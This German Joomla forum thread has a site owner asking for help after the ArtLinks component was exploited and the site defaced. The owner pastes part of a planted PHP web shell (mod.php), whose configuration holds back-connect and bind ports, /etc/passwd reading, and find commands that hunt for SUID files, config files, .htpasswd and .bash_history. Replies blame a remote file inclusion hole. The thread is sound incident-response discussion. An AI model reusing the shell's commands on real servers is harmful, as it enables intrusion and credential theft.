Thema: [verschoben] Hilfe "Hacked By ERRORSS"

Hab die forensuche schon benutzt aber bin nicht leider nicht fündig geworden und ist extrem dringend.

Unser portal wurde wohl gehackt, ums genauzusagen im ARTlinks mod.
hier lang

Das ganze hab ich per google auch noch mal hier gefunden.
http://www.schiedsrichter-welt.de/in...orum&Itemid=36

Jetzt bin ich erstmal am grübeln wie ich das da wieder rausbekomme. Zweitens wie die das genau gemacht haben. Und drittens hab ich noch eine datei gefunden namens mod.php im verzeichniss der compononet/artlink/image/ mit folgendem inhalt der mir schon mit meinem halbwissen gehörig spanisch vorkommt...

.
.
.
.
$log_email = "tes_server@yahoo.com"; //Default e-mail for sending logs

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = true; //If true then save sorting-position using cookies.

// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","d oc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","t cl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe" ,"bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","z ip","rar","gz","tar")
);

// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);

/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{bre ak})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if true and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
array("config.php",1) // example
);

$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8; // lines in hex preview file
$hexdump_rows = 24; // 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "XXXXXXX"; // default password for binding
$bindport_port = "XXXXXX"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe

// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("--------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux 2nd extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
.
.
.
.
{

Hab datei erstmal gelöscht, ging allerdings auch nur aus dem joomexplorer herraus, mit flashFXP hab ichs so erstmal nicht hinbekommen. Hoffe jemand hat ne idee was ich jetzt am besten mache, den mod erstmal deaktivieren wegen nem sicherheitsleck, oder sind die gar woanders reingekommen? Dann blöde frage aber wie bekomm ich den schmu da wieder herraus, sprich diese Hacked by ERRORS blabalba, such mir gerade nen wolf???


LG

Art Links löschen, da verletzlich! Deaktivieren reicht nicht, da die Files die Angriffsfläche bieten.

Hey, danke schon mal für die schnelle antwort und verschieben des threads. Hab Sicherheit irgendwie übersehen.

Gibts denn echt nur die möglichkeit den LinkART Mod komplett platt zu machen, dann müsst man den mod ja quasi auch aus den downloadberreich hier nehmen

LG

So ist es.

Nachtrag:

com_artlinks <== remote file inclusion

http://forum.joomla.org/index.php/topic,76328.0.html

http://forum.joomla.org/index.php/to...html#msg401990